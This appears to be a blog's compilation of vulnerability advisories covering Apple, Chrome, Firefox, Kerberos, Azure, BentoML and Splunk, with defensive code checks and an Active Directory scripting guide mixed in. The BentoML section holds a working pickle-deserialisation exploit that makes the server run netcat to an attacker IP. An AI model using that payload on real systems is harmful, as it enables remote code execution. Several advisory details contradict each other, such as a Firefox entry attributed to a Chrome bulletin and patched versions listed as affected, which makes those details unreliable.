Classification:
- Impact: Loss of confidentiality, integrity, availability
- Exploit: Unknown exploit
- Solution: Update

Affected Systems:
- iOS versions prior to 18.4.1
- iPadOS versions prior to 18.4.1
- macOS Sequoia versions prior to 15.4.1
- tvOS versions prior to 18.4.1
- visionOS versions prior to 2.4.1
- visionOS before 2.4.1
- Vision Pro
- Apple TV HD/4K
- iPad mini 5th/Pro 11-inch/Pro 13-inch/Pro 13.9-inch 3rd gen

Risks:
- Compromise of data confidentiality
- Bypass of security policies
- Denial of service
- Privilege escalation

Conclusion:
Recently, multiple vulnerabilities were discovered in Apple products. The exploitation of these vulnerabilities is as follows:

CVE-2025-31200
The vulnerability CVE-2025-31200 is a memory corruption flaw in Apple’s Core Audio framework. This vulnerability allows code execution when processing a malicious audio stream in a media file. It has been patched in the following versions: tvOS 18.4.1, visionOS 2.4.1, iOS 18.4.1, iPadOS 18.4.1, and macOS Sequoia 15.4.1. Apple has acknowledged reports indicating that this flaw has been exploited in highly sophisticated attacks targeting specific individuals.

CVE-2025-31201
The vulnerability CVE-2025-31201 affects Apple’s RPAC component. An attacker with arbitrary read and write capabilities could bypass pointer authentication. This flaw was fixed by removing the vulnerable code section in the same software versions as CVE-2025-31200. Like CVE-2025-31200, this vulnerability has also been exploited in sophisticated attacks.

These two vulnerabilities highlight the importance of keeping systems updated to protect against security risks. Users are strongly encouraged to update their devices to the latest available versions to safeguard against these flaws.

Note: Apple confirms that both vulnerabilities referenced under CVE-2025-31200 and CVE-2025-31201 are being actively exploited.

References:
- CVE Reference CVE-2025-31200, CVSS Score: 7.50
- CVE Reference CVE-2025-31201, CVSS Score: 6.80

Solution: Update
- Apple iOS versions prior to 18.4.1: https://support.apple.com/en-us/100100
- visionOS before 2.4.1: https://support.apple.com/en-us/100100
- macOS Sequoia versions prior to 15.4.1: https://support.apple.com/en-us/100100

Vendor-Specific Advisory:
- https://support.apple.com/en-us/122282
- https://support.apple.com/en-us/122402
- https://support.apple.com/en-us/122401
- https://support.apple.com/en-us/122400
Multiple Vulnerabilities in Google Chrome
Creation Date: April 16, 2025
Source: Google Chrome Security Bulletin

Classification:
- Impact: Loss of confidentiality, integrity, availability
- Exploit: Unknown exploit
- Solution: Update

Affected Systems:
- Chrome versions prior to 135.0.7049.95 for Linux
- Chrome versions prior to 135.0.7049.95/.96 for Windows
- Chrome versions prior to 135.0.7049.95/.96 for Mac

Conclusion
The vulnerabilities CVE-2025-3619 and CVE-2025-3620 were recently identified in the Google Chrome browser, affecting millions of users worldwide. These security flaws present significant risks and require immediate attention to prevent potential exploitation by malicious actors.

CVE-2025-3619: Buffer Overflow in Codecs
The vulnerability CVE-2025-3619 is classified as critical and involves a buffer overflow in Chrome’s codecs. A buffer overflow occurs when data is written outside the allocated memory boundaries, which could allow an attacker to execute arbitrary code. This flaw could lead to a full system compromise if successfully exploited.

CVE-2025-3620: Use-After-Free in USB
The vulnerability CVE-2025-3620 is a “use-after-free” flaw in Chrome’s USB functionality. This type of vulnerability occurs when the program attempts to use memory after it has been freed, creating an opportunity for malicious exploitation. This flaw could also allow arbitrary code execution, although it is classified as less severe than CVE-2025-3619.

References:
- CVE-2025-3620, CVSS score 8.10
- CVE-2025-3619, CVSS score 9.80
- Google Security Advisory: https://chromereleases.googleblog.com/2025/04/stable-channel-update-for-desktop_15.html

Solution:
Ensure that Google Chrome is updated to version 135.0.7049.95/.96 for Windows and macOS, and 135.0.7049.95 for Linux. This update addresses the identified security vulnerabilities.
Memory Corruption Vulnerability in Mozilla Firefox
Creation Date: April 15, 2025
Source: Google Chrome Security Bulletin

Classification:
- Impact: Loss of confidentiality, integrity, availability
- Exploit: Unknown exploit
- Solution: Update

Affected Systems:
- Firefox versions prior to 137.0.2

Conclusion:
The vulnerability CVE-2025-3608 involves a race condition in Firefox’s nsHttpTransaction. A race condition occurs when two processes or threads concurrently access a shared resource, leading to unpredictable behavior. In this case, the race condition could result in memory corruption, potentially allowing attackers to execute arbitrary code.

Impact:
This vulnerability is classified as high severity. The resulting memory corruption could enable an attacker to compromise the affected system.

References:
- CVE-2025-3608, CVSS score: 8.10
- Mozilla Security Advisory: https://www.mozilla.org/en-US/security/advisories/mfsa2025-25/

Solution:
Update to Mozilla Firefox 137.0.2: https://www.mozilla.org/en-US/firefox/137.0.2/releasenotes/
Content Spoofing Vulnerability in MIT Kerberos
Title: MIT Kerberos
Creation Date: March 24, 2025
Source: Red Hat Security Bulletin

Classification:
- Impact: Loss of integrity
- Exploit: Unknown
- Solution: Unknown

Affected Systems:
- Red Hat Ansible Automation Platform version 2
- Red Hat Enterprise Linux version 9
- Red Hat Enterprise Linux version 7
- Red Hat Enterprise Linux version 6
- Red Hat Enterprise Linux version 8
- Red Hat OpenShift version 4
- MIT Kerberos version –
- MIT Kerberos5 version –

Risks:
- Message Forgery
- Loss of Integrity
- Exploitation of Encryption Preferences

Conclusion:
CVE-2025-3576 is a recently published vulnerability affecting the MIT Kerberos implementation. This vulnerability allows the spoofing of messages protected by GSSAPI using RC4-HMAC-MD5 due to weaknesses in the MD5 checksum design. If RC4 is preferred over stronger encryption types, an attacker could exploit MD5 collisions to forge message integrity codes, potentially leading to unauthorized message tampering.

References:
- CVE-2025-3576
- CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
  - Attack Vector: Network
  - Attack Complexity: High
  - Privileges Required: None
  - User Interaction: None
  - Scope: Unchanged
  - Confidentiality: None
  - Integrity: High
  - Availability: None

Red Hat Bugzilla Advisory:
- https://bugzilla.redhat.com/show_bug.cgi?id=2359465
- https://bugzilla.redhat.com/show_bug.cgi?id=2359673
- https://bugzilla.redhat.com/show_bug.cgi?id=2359672
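The exposure condition named above is RC4 being preferred over stronger encryption types. The following check is an added example, not code from Red Hat or MIT: it reads the enctype lists in the `[libdefaults]` section of a krb5.conf and reports where RC4 sits in the preference order. The sample configuration is constructed, the function names are hypothetical, and a key that is absent falls back to the library's built-in default, which this check does not evaluate.

```python
import re

# krb5.conf [libdefaults] keys that carry an ordered enctype preference list.
ENCTYPE_KEYS = ("permitted_enctypes", "default_tkt_enctypes", "default_tgs_enctypes")
# Names under which RC4-HMAC-MD5 can appear in those lists.
RC4_NAMES = {"rc4", "rc4-hmac", "arcfour-hmac", "arcfour-hmac-md5"}


def is_stronger(token):
    # Assumption of this example: AES and Camellia entries count as stronger.
    return token.startswith(("aes", "camellia"))


def parse_libdefaults(text):
    """Return the key/value pairs of the [libdefaults] section."""
    section, settings = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank line or comment
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            section = header.group(1)
            continue
        if section == "libdefaults" and "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip()
    return settings


def classify(value):
    """Classify one enctype list by where RC4 sits in the preference order."""
    tokens = [t.lower() for t in re.split(r"[,\s]+", value) if t]
    # A leading "-" removes an entry (for example "DEFAULT -rc4").
    enabled = [t.lstrip("+") for t in tokens if not t.startswith("-")]
    rc4_at = [i for i, t in enumerate(enabled) if t in RC4_NAMES]
    if not rc4_at:
        return "rc4-not-listed"
    stronger_at = [i for i, t in enumerate(enabled) if is_stronger(t)]
    if not stronger_at or rc4_at[0] < stronger_at[0]:
        return "rc4-preferred"
    return "rc4-listed-after-stronger"


def audit(text):
    settings = parse_libdefaults(text)
    return {key: classify(settings[key]) for key in ENCTYPE_KEYS if key in settings}


# Constructed sample configuration, not taken from any real host.
SAMPLE_KRB5_CONF = """
[libdefaults]
    default_realm = EXAMPLE.TEST
    # RC4 first: the condition the advisory describes
    permitted_enctypes = arcfour-hmac aes256-cts-hmac-sha1-96
    default_tkt_enctypes = aes256-cts-hmac-sha1-96, rc4-hmac
    default_tgs_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96

[realms]
    EXAMPLE.TEST = {
        kdc = kdc.example.test
    }
"""

if __name__ == "__main__":
    for key, verdict in audit(SAMPLE_KRB5_CONF).items():
        print(f"{key}: {verdict}")
```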
Multiple Vulnerabilities in Microsoft Azure
Date Created: 04/09/2025
Source: Microsoft Azure Security Bulletin

Classification:
- Impact: Loss of integrity, confidentiality, availability
- Exploit: Unknown
- Solution: Patch

Risks:
- Compromised data confidentiality
- Privilege escalation

Affected Systems:
- Azure Local Cluster versions prior to 2411.2
- Azure Stack HCI OS 22H2 versions prior to 10.0.20348.3328
- Azure Stack HCI OS 23H2 versions prior to 10.0.25398.1486
- Windows Admin Center
- Windows Admin Center in Azure Portal

Conclusion
Multiple high-severity vulnerabilities have been identified in Microsoft Azure. These vulnerabilities could allow an attacker to cause information disclosure and privilege escalation.

- CVE-2025-29819: The issue occurs in Windows Admin Center in Azure Portal. Exploiting this vulnerability could allow a local attacker to disclose information locally.
- CVE-2025-26628: The issue occurs in Azure Local Cluster. Insufficiently protected credentials in the Azure Local Cluster could allow an authorized attacker to disclose information locally.
- CVE-2025-27489: The issue occurs in Azure Local. Exploiting this vulnerability could allow a local attacker to escalate privileges locally.
- CVE-2025-25002: The issue occurs in Azure Local Cluster. Exploiting this vulnerability could allow an adjacent attacker to disclose information locally.

References:
- CVE-2025-25002, CVSS score 6.80
- CVE-2025-26628, CVSS score 7.30
- CVE-2025-29819, CVSS score 6.20
- CVE-2025-27489, CVSS score 7.80

Microsoft Security Advisory:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26628
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25002
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27489
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29819

Solution: Security Patch
- Microsoft Windows Admin Center: https://info.microsoft.com/ww-landing-windows-admin-center.html
- Microsoft Windows Admin Center in Azure Portal: Manage a Windows VMs using Windows Admin Center in Azure | Microsoft Learn
- Microsoft Azure Stack HCI OS 23H2: About updates for Azure Local, version 23H2 – Azure Local | Microsoft Learn
- Microsoft Azure Stack HCI OS 22H2: https://support.microsoft.com/en-us/topic/release-notes-for-azure-stack-hci-version-22h2-fea63106-a0a9-4b6c-bb72-a07985c98a56
Critical BentoML Vulnerability Enables Remote Code Execution (RCE) – Exploit Available
Vulnerability Identification
- CVE Reference: CVE-2025-27520
- CVSS Score: 9.8 (Critical)
- Impact: Remote Code Execution (RCE) compromising integrity, confidentiality, and availability
- Affected Library: BentoML, a Python library for deploying optimized online serving systems for AI applications and model inference

Technical Details
- Root Cause: Insecure deserialization in BentoML
- Vulnerable Code File: serde.py, where HTTP request payloads can be manipulated

Vulnerable Code Snippet:

```python
# Excerpt from serde.py (method of the serializer class)
def deserialize_value(self, payload: Payload) -> t.Any:
    if "buffer-lengths" not in payload.metadata:
        return pickle.loads(b"".join(payload.data))  # Unsafe deserialization
```

Data flow analysis confirms that the payload content comes from HTTP requests, which attackers can fully manipulate. Because the payload is not validated, malicious serialized data can execute harmful actions during deserialization.

Affected Versions
- Vulnerable Versions: 1.3.4 through 1.4.2

Risks
- Complete system compromise: Attackers can gain full control
- Data theft: Sensitive data exfiltration
- Denial of Service (DoS): Systems can be rendered unusable
- Malware installation: Malicious software can be deployed

Recommendations
- Urgent Update: Immediately upgrade to BentoML version 1.4.3

Proof of Concept (PoC)

Test Environment
- Target Server: IP: 10.98.36.123, OS: Ubuntu
- Attacker Machine: IP: 10.98.36.121, OS: Ubuntu

Reproduction Steps

1. Install BentoML on server:

```bash
pip install -U bentoml
```

2. Deploy vulnerable service:

```python
# service.py
import bentoml


@bentoml.service(resources={"cpu": "4"})
class Summarization:
    def __init__(self):
        import torch
        from transformers import pipeline

        # Use the GPU when one is available, otherwise fall back to CPU
        device = "cuda" if torch.cuda.is_available() else "cpu"
        self.pipeline = pipeline('summarization', device=device)

    @bentoml.api(batchable=True)
    def summarize(self, texts: list[str]) -> list[str]:
        results = self.pipeline(texts)
        return [item['summary_text'] for item in results]
```

3. Run service.

4. Attacker listens for connection:

```bash
nc -lvvp 1234
```

5. Attacker sends malicious payload:

```python
import os
import pickle

import requests

# The pickle content type routes the request body to the unsafe deserializer
headers = {'Content-Type': 'application/vnd.bentoml+pickle'}


class Evil:
    def __reduce__(self):
        # Called on the server when the payload is unpickled
        return (os.system, ('nc 10.98.36.121 1234',))


payload = pickle.dumps(Evil())
requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers)
```

6. Result: The server (10.98.36.123) initiates a connection to the attacker (10.98.36.121) on port 1234, confirming successful RCE.
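The root cause described above, as an added example that is not BentoML's code or its 1.4.3 fix: a harmless constructed payload whose `__reduce__` makes `pickle.loads` call `os.getpid`, set beside a data-only unpickler and a content-type gate. `SenderChosenCall`, `DataOnlyUnpickler`, `data_only_loads` and `decode_request` are hypothetical names introduced for illustration.

```python
import io
import json
import os
import pickle

# Content type taken from the PoC request on this page.
PICKLE_CONTENT_TYPE = "application/vnd.bentoml+pickle"


class SenderChosenCall:
    """Constructed, harmless stand-in for a hostile object: unpickling it
    makes the receiver call os.getpid() rather than a shell command."""

    def __reduce__(self):
        return (os.getpid, ())


def unsafe_decode(body: bytes):
    # Same pattern as the vulnerable snippet: pickle.loads on request bytes.
    return pickle.loads(body)


class DataOnlyUnpickler(pickle.Unpickler):
    """Hypothetical hardening: every global lookup is refused, so only
    containers, strings, bytes, numbers, booleans and None can be rebuilt."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def data_only_loads(body: bytes):
    return DataOnlyUnpickler(io.BytesIO(body)).load()


def decode_request(content_type: str, body: bytes):
    """Hypothetical request gate: JSON is parsed, the pickle content type is
    refused before any byte of the body is interpreted."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type == "application/json":
        return json.loads(body)
    if media_type == PICKLE_CONTENT_TYPE:
        raise ValueError("pickle payloads are not accepted from HTTP clients")
    raise ValueError(f"unsupported content type: {media_type}")


def demo():
    hostile = pickle.dumps(SenderChosenCall())
    benign = {"texts": ["first document", "second document"]}
    results = {}

    # 1. Vulnerable path: the callable named by the sender runs in this process.
    results["unsafe_ran_callable"] = unsafe_decode(hostile) == os.getpid()

    # 2. Data-only unpickler: plain data survives, the callable is refused.
    results["benign_roundtrip"] = data_only_loads(pickle.dumps(benign))
    try:
        data_only_loads(hostile)
        results["hostile_blocked"] = False
    except pickle.UnpicklingError as exc:
        results["hostile_blocked"] = True
        results["blocked_reason"] = str(exc)

    # 3. Content-type gate: JSON passes, the pickle type never reaches pickle.
    results["json_ok"] = decode_request("application/json", json.dumps(benign).encode())
    try:
        decode_request(PICKLE_CONTENT_TYPE, hostile)
        results["pickle_type_rejected"] = False
    except ValueError:
        results["pickle_type_rejected"] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Refusing the pickle content type outright is the stronger of the two controls; the data-only unpickler only removes the code-execution path through global lookups.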
Apple Security Alert 2024: Critical Vulnerabilities Found – Update Now!
Critical Apple Security Vulnerabilities: What You Need to Know

Classification:
- Impact: Loss of confidentiality, integrity, and availability
- Exploit: Unknown exploit
- Solution: Update

Affected Systems:
- iOS versions prior to 15.8.4
- iOS versions prior to 16.7.11
- iOS versions prior to 18.4
- iPadOS versions prior to 15.8.4
- iPadOS versions prior to 16.7.11
- iPadOS versions prior to 17.7.6
- iPadOS versions prior to 18.4
- macOS Sequoia versions prior to 15.4
- macOS Sonoma versions prior to 14.7.5
- macOS Ventura versions prior to 13.7.5
- Safari versions prior to 18.4
- tvOS versions prior to 18.4
- visionOS versions prior to 2.4
- Xcode versions prior to 16.3

Risks:
- Compromised data integrity
- Compromised data confidentiality
- Security policy bypass
- Remote denial of service
- Arbitrary code execution
- Privilege escalation

Conclusion:
Recently, multiple vulnerabilities have been discovered in Apple products. Exploiting these vulnerabilities could allow arbitrary code execution, privilege escalation, information disclosure, security measure bypass, and denial of service. Apple has indicated that the vulnerabilities CVE-2025-24200 and CVE-2025-24201 are being actively exploited.

Note: It is recommended to update your devices to protect against these vulnerabilities.
References: CVE-2023-27043 CVE-2024-40864 CVE-2024-48958 CVE-2024-54502 CVE-2024-54508 CVE-2024-54533 CVE-2024-54534 CVE-2024-54543 CVE-2024-56171 CVE-2024-9681 CVE-2025-24085 CVE-2025-24093 CVE-2025-24095 CVE-2025-24097 CVE-2025-24113 CVE-2025-24139 CVE-2025-24148 CVE-2025-24157 CVE-2025-24163 CVE-2025-24164 CVE-2025-24167 CVE-2025-24170 CVE-2025-24172 CVE-2025-24173 CVE-2025-24178 CVE-2025-24180 CVE-2025-24181 CVE-2025-24182 CVE-2025-24190 CVE-2025-24191 CVE-2025-24192 CVE-2025-24193 CVE-2025-24194 CVE-2025-24195 CVE-2025-24196 CVE-2025-24198 CVE-2025-24199 CVE-2025-24200 CVE-2025-24201 CVE-2025-24202 CVE-2025-24203 CVE-2025-24204 CVE-2025-24205 CVE-2025-24207 CVE-2025-24208 CVE-2025-24209 CVE-2025-24210 CVE-2025-24211 CVE-2025-24212 CVE-2025-24213 CVE-2025-24214 CVE-2025-24215 CVE-2025-24216 CVE-2025-24217 CVE-2025-24218 CVE-2025-24221 CVE-2025-24226 CVE-2025-24228 CVE-2025-24229 CVE-2025-24230 CVE-2025-24231 CVE-2025-24232 CVE-2025-24233 CVE-2025-24234 CVE-2025-24235 CVE-2025-24236 CVE-2025-24237 CVE-2025-24238 CVE-2025-24239 CVE-2025-24240 CVE-2025-24241 CVE-2025-24242 CVE-2025-24243 CVE-2025-24244 CVE-2025-24245 CVE-2025-24246 CVE-2025-24247 CVE-2025-24248 CVE-2025-24249 CVE-2025-24250 CVE-2025-24253 CVE-2025-24254 CVE-2025-24255 CVE-2025-24256 CVE-2025-24257 CVE-2025-24259 CVE-2025-24260 CVE-2025-24261 CVE-2025-24262 CVE-2025-24263 CVE-2025-24264 CVE-2025-24265 CVE-2025-24266 CVE-2025-24267 CVE-2025-24269 CVE-2025-24272 CVE-2025-24273 CVE-2025-24276 CVE-2025-24277 CVE-2025-24278 CVE-2025-24279 CVE-2025-24280 CVE-2025-24281 CVE-2025-24282 CVE-2025-24283 CVE-2025-27113 CVE-2025-30424 CVE-2025-30425 CVE-2025-30426 CVE-2025-30427 CVE-2025-30428 CVE-2025-30429 CVE-2025-30430 CVE-2025-30432 CVE-2025-30433 CVE-2025-30434 CVE-2025-30435 CVE-2025-30437 CVE-2025-30438 CVE-2025-30439 CVE-2025-30441 CVE-2025-30443 CVE-2025-30444 CVE-2025-30446 CVE-2025-30447 CVE-2025-30449 CVE-2025-30450 CVE-2025-30451 CVE-2025-30452 CVE-2025-30453 CVE-2025-30454 CVE-2025-30455 
CVE-2025-30456 CVE-2025-30457 CVE-2025-30458 CVE-2025-30460 CVE-2025-30461 CVE-2025-30462 CVE-2025-30463 CVE-2025-30464 CVE-2025-30465 CVE-2025-30467 CVE-2025-30469 CVE-2025-30470 CVE-2025-30471 CVE-2025-31182 CVE-2025-31183 CVE-2025-31184 CVE-2025-31187 CVE-2025-31188 CVE-2025-31191 CVE-2025-31192 CVE-2025-31194

Vendor-Specific Advisory:
- https://support.apple.com/en-us/122371
- https://support.apple.com/en-us/122379
- https://support.apple.com/en-us/122380
- https://support.apple.com/en-us/122372
- https://support.apple.com/en-us/122346
- https://support.apple.com/en-us/122345
- https://support.apple.com/en-us/122373
- https://support.apple.com/en-us/122374
- https://support.apple.com/en-us/122375
- https://support.apple.com/en-us/122377
- https://support.apple.com/en-us/122378
- https://support.apple.com/en-us/122376

🔒 Stay safe, stay updated, and share this alert with other Apple users!
What You Need to Know About Critical Vulnerabilities in Splunk
Splunk recently issued a security advisory detailing multiple high-severity vulnerabilities affecting Splunk Enterprise, Splunk Cloud Platform, and Splunk Secure Gateway. These vulnerabilities pose significant risks, including remote code execution (RCE) and information disclosure, potentially allowing attackers to compromise sensitive data or take control of affected systems.

Affected Systems
The vulnerabilities impact the following versions:
- Splunk Enterprise:
  - Versions 9.1.0 to 9.1.7
  - Versions 9.2.0 to 9.2.4
  - Versions 9.3.0 to 9.3.2
  - All versions prior to 9.4.1, 9.3.3, 9.2.5, and 9.1.8
- Splunk Cloud Platform: Versions earlier than 9.3.2408.104, 9.2.2406.108, and 9.1.2312.208
- Splunk Secure Gateway: Versions earlier than 3.8.38 and 3.7.23

Key Vulnerabilities

CVE-2025-20229: Remote Code Execution (RCE)
- CVSS Score: 8.0 (High)
- Description: This vulnerability could allow an authenticated remote attacker to execute arbitrary code by uploading a malicious file to the $SPLUNK_HOME/var/run/splunk/apptemp directory.
- Impact: Attackers could gain full control over the affected system, leading to data breaches or further network compromise.

CVE-2025-20231: Information Disclosure
- CVSS Score: 7.1 (High)
- Description: Splunk Secure Gateway exposes user session and authorization tokens in plaintext within the splunk_secure_gateway.log file when interacting with the /services/ssg/secrets endpoint.
- Impact: Attackers could steal sensitive credentials or session tokens, potentially leading to unauthorized access.

Recommended Solutions

Apply Updates Immediately
Upgrade to the latest patched versions:
- Splunk Enterprise: 9.4.1, 9.3.3, 9.2.5, or 9.1.8 and later.
- Splunk Cloud Platform: 9.3.2408.104, 9.2.2406.108, or 9.1.2312.208.
- Splunk Secure Gateway: 3.8.38 or 3.7.23 and later.

Download updates from the official Splunk website: https://www.splunk.com.

Temporary Workaround for CVE-2025-20231
If Splunk Secure Gateway is not in use, Splunk recommends disabling it as a temporary mitigation.

Additional Resources
For more details, refer to Splunk’s official advisories:
- Splunk Advisory SVD-2025-0302
- Splunk Advisory SVD-2025-0301

Final Thoughts
These vulnerabilities underscore the importance of timely patch management and robust security practices. Organizations using Splunk should prioritize applying these updates to mitigate potential risks. Stay vigilant and ensure your systems are protected against emerging threats.

For further updates, follow Splunk’s security bulletins or subscribe to cybersecurity news feeds. Stay secure!
Simplify AD User Creation: GUI & PowerShell
Active Directory (AD) is a crucial component for managing users and resources in an enterprise environment. In this guide, we will cover how to create a user in Active Directory using both the GUI and PowerShell, including bulk user creation with a random password using a CSV file.

1. Creating a User via the Active Directory GUI

Follow these steps to create a user using the Active Directory Users and Computers (ADUC) GUI:

Step 1: Open Active Directory Users and Computers (ADUC)
Press `Win + R`, type `dsa.msc`, and press Enter. Or open Server Manager > Active Directory Users and Computers.

Step 2: Navigate to the Organizational Unit (OU)
In the left pane, expand your domain. Locate and select the OU where you want to create the user. In this example we are going to choose the London OU.

Step 3: Create a New User
Right-click on the OU, select New, and click User. Fill in the following details:
- First Name (e.g., Taha)
- Last Name (e.g., kssama)
- User logon name (e.g., t.kssama@tic.local)
Click Next.

Step 4: Set the User’s Password
Enter a secure password. Choose the following option: User must change password at next logon. Click Next and then Finish.

2. Bulk Creating Users with PowerShell and CSV

Step 1: Prepare the CSV File
Create a CSV file (e.g., `C:\users.csv`) with the following format:

FirstName;LastName;Function;OU;Department

Note:

Step 2: PowerShell Script for Bulk User Creation
Copy and paste the following script into Notepad and save it with a .ps1 extension (e.g., script.ps1).

```powershell
# Requires the ActiveDirectory module and rights to create users in the target OUs
Import-Module ActiveDirectory

$CSVFile = "C:\users.csv"
# The CSV format shown in Step 1 is semicolon-separated, so the delimiter must be ";"
$CSVData = Import-Csv -Path $CSVFile -Delimiter ";" -Encoding UTF8
$PasswordExportPath = "C:\userspass\user_passwords.csv"
$ExportFolder = "C:\userspass"

# Check if the export folder exists, if not, create it
if (!(Test-Path $ExportFolder)) {
    New-Item -ItemType Directory -Path $ExportFolder | Out-Null
}

# Create an array to store user credentials for export
$UserPasswords = @()

Foreach ($User in $CSVData) {
    $UserFirstName = $User.FirstName
    $UserLastName = $User.LastName
    # Logon name: first initial + "." + last name, lower-cased (e.g., t.kssama)
    $UserSamAccountName = ($UserFirstName.Substring(0,1) + "." + $UserLastName).ToLower()
    $UserEmail = "$UserSamAccountName@tic.local"
    $UserFunction = $User.Function
    $UserDepartment = $User.Department
    $UserOU = $User.OU

    # Generate a random 12-character password from digits, upper- and lower-case letters.
    # Get-Random -Count draws without repetition, so no character appears twice.
    $UserPassword = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 12 | ForEach-Object {[char]$_})
    $SecurePassword = ConvertTo-SecureString $UserPassword -AsPlainText -Force

    # Check if the user already exists in AD
    if (Get-ADUser -Filter {SamAccountName -eq $UserSamAccountName}) {
        Write-Warning "The identifier $UserSamAccountName already exists in AD"
    }
    else {
        # Create the AD user
        New-ADUser -Name "$UserLastName $UserFirstName" `
            -DisplayName "$UserLastName $UserFirstName" `
            -GivenName $UserFirstName `
            -Surname $UserLastName `
            -SamAccountName $UserSamAccountName `
            -UserPrincipalName "$UserSamAccountName@tic.local" `
            -EmailAddress $UserEmail `
            -Title $UserFunction `
            -Department $UserDepartment `
            -Path $UserOU `
            -AccountPassword $SecurePassword `
            -ChangePasswordAtLogon $true `
            -Enabled $true

        Write-Output "User created: $UserSamAccountName ($UserLastName $UserFirstName)"

        # Store credentials for export
        $UserPasswords += [PSCustomObject]@{
            FirstName = $UserFirstName
            LastName  = $UserLastName
            Username  = $UserSamAccountName
            Password  = $UserPassword
        }
    }
}

# Export the generated usernames and passwords to CSV (plain text)
$UserPasswords | Export-Csv -Path $PasswordExportPath -NoTypeInformation -Encoding UTF8
Write-Output "User credentials exported to $PasswordExportPath"
```

Step 3: Run the Script
Open PowerShell as Administrator and navigate to the path where the .ps1 file is located. Before you run the script, don’t forget to modify the path of the CSV file if needed. Run the script:

```powershell
.\script.ps1
```

The script prints a "User created: ..." line for each account it creates and, at the end, the path of the exported credentials file.

Step 4: Verify the Created Users
Run the following command in PowerShell to check if the users were created:

```powershell
Get-ADUser -Filter * | Select-Object Name, SamAccountName
```

Step 5: Access the User Credentials CSV
After running the script, open `C:\userspass\user_passwords.csv` to retrieve the generated usernames and passwords. The file holds the initial passwords in plain text, so restrict access to it and delete it once the credentials have been handed over.

Conclusion
- GUI: Best for creating a single user interactively.
- PowerShell (Bulk Creation): Best for creating multiple users quickly with predefined attributes.
- CSV Automation: Ensures consistency and saves time in large environments.

This guide provides a seamless way to efficiently manage users in Active Directory. 🚀 Happy admin work! 😊
Critical Vulnerability in Mozilla Firefox
Classification:
- Impact: Loss of confidentiality, integrity, and availability
- Exploitability: Unknown exploit
- Resolution: Apply updates

Affected Versions:
- Firefox 136.0.4
- Firefox ESR 128.8.1
- Firefox ESR 115.21.1

Risk Assessment:
- Remote code execution (RCE) allowing system compromise.

Vulnerability Summary:
Mozilla has patched a critical sandbox escape vulnerability in Firefox’s Inter-Process Communication (IPC) mechanism. Attackers could exploit improper handling of system handles to elevate privileges and bypass sandbox protections, potentially gaining control of affected systems. This flaw shares similarities with CVE-2025-2783, a recently exploited Chrome vulnerability.

Patched Versions:
- Firefox 136.0.4
- Firefox ESR 128.8.1
- Firefox ESR 115.21.1

Action Required: Immediate update to the latest version to mitigate exploitation risks.

References:
- CVE-2025-2857
- CVSS 3.1 Score: 9.8 (Critical)

Remediation:
Download the latest secure release:
- Firefox 136.0.4 Release Notes
- Firefox ESR 115.21.1 Release Notes
- Firefox ESR 128.8.1 Release Notes